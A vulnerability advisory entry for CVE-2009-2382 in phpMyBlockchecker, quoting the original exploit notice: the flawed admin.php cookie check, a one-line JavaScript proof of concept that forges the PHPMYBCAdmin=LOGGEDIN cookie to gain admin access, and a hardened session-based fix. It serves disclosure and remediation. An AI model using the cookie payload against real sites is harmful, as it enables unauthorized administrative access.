jay-jayx0r phpmyblockchecker admin.php user authentication and access control vulnerability

Vulnerability ID: 1118043    Vulnerability type: Authorization issue
Published: 2009-06-30    Updated: 2009-06-30
CVE ID: CVE-2009-2382    CNNVD ID: CNNVD-200907-130
Platform: PHP    CVSS score: 7.5
|Vulnerability sources
https://www.exploit-db.com/exploits/9053
https://www.securityfocus.com/bid/43799
https://cxsecurity.com/issue/WLB-2009070120
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200907-130
|Vulnerability details
admin.php in PhpMyBlockchecker 1.0.0055 allows remote attackers to bypass authentication and gain administrator access by setting the PHPMYBCAdmin cookie to LOGGEDIN.
|Exploit (EXP)
################################################################################################################
[+] phpMyBlockchecker 1.0.0055 Insecure Cookie Handling Vulnerability
[+] Discovered By SirGod
[+] http://insecurity-ro.org
[+] http://h4cky0u.org
#################################################################################################################

[+] Download Script :
http://sourceforge.net/project/showfiles.php?group_id=116966&package_id=152150&release_id=326884

[+] Insecure Cookie Handling

 - Vulnerable code in admin.php

-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
if ($_COOKIE[PHPMYBCAdmin] == '') {
if (!$_POST[login] == 'login') {
die("Please Login:<BR><form method=post><input type=password
name=password><input type=hidden value=login name=login><input
type=submit></form>");
} elseif($_POST[password] == $bcadminpass) {
setcookie("PHPMYBCAdmin","LOGGEDIN", time() + 60 * 60);
header("Location: admin.php"); } else { die("Incorrect"); }
}
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

 - PoC

    javascript:document.cookie = "PHPMYBCAdmin=LOGGEDIN; path=/";
    document.cookie = "1246371700; path=/";


#################################################################################################################

# milw0rm.com [2009-06-30]
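The root cause in the excerpt above is that admin.php treats a client-controlled cookie value ("LOGGEDIN") as proof of authentication. The following is an added example, not phpMyBlockchecker's own code, showing the flawed check next to a hardened replacement that keeps login state in a server-side PHP session and verifies a password hash; $bcadminpass_hash is an assumed configuration value.

```php
<?php
// Added example (not from phpMyBlockchecker): flawed cookie check vs. a
// session-based replacement for the admin.php login gate.
declare(strict_types=1);

// Assumed config value; in practice store password_hash() output in config.php.
$bcadminpass_hash = password_hash('REPLACE-WITH-REAL-PASSWORD', PASSWORD_DEFAULT);

// --- flawed pattern, equivalent to the advisory excerpt ---
function isAdminInsecure(array $cookie): bool {
    // Any client can set this cookie; no secret or server state is involved,
    // so presenting PHPMYBCAdmin=LOGGEDIN is enough to pass the check.
    return ($cookie['PHPMYBCAdmin'] ?? '') === 'LOGGEDIN';
}

// --- hardened pattern ---
function startSecureSession(): void {
    if (session_status() === PHP_SESSION_ACTIVE) {
        return;
    }
    // Session ID cookie is the only client-side token; keep it out of JS reach.
    session_set_cookie_params(['httponly' => true, 'samesite' => 'Strict']);
    session_start();
}

function adminLogin(string $submittedPassword, string $bcadminpassHash): bool {
    startSecureSession();
    if (!password_verify($submittedPassword, $bcadminpassHash)) {
        return false;
    }
    session_regenerate_id(true);   // fresh ID on privilege change (fixation)
    $_SESSION['is_admin'] = true;  // authorization lives server-side only
    return true;
}

function isAdminSecure(): bool {
    startSecureSession();
    return ($_SESSION['is_admin'] ?? false) === true;
}

// Request handling for admin.php: login form unless the session says admin.
if (!isAdminSecure()) {
    if (($_POST['login'] ?? '') === 'login'
        && adminLogin((string)($_POST['password'] ?? ''), $bcadminpass_hash)) {
        header('Location: admin.php');
        exit;
    }
    http_response_code(401);
    die('Please Login:<br><form method="post"><input type="password" name="password">'
        . '<input type="hidden" value="login" name="login"><input type="submit"></form>');
}
```

With this change a request carrying PHPMYBCAdmin=LOGGEDIN no longer has any effect, because the cookie name is never consulted and admin status is only set after password_verify() succeeds.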
|Affected products
phpMyBlockchecker phpMyBlockchecker 1.0.55
|References

Source: XF
Name: phpmyblockchecker-phpmybcadmin-auth-bypass(51445)
Link: http://xforce.iss.net/xforce/xfdb/51445
Source: MILW0RM
Name: 9053
Link: http://www.milw0rm.com/exploits/9053
Source: SECUNIA
Name: 35660
Link: http://secunia.com/advisories/35660
Source: OSVDB
Name: 55505
Link: http://osvdb.org/55505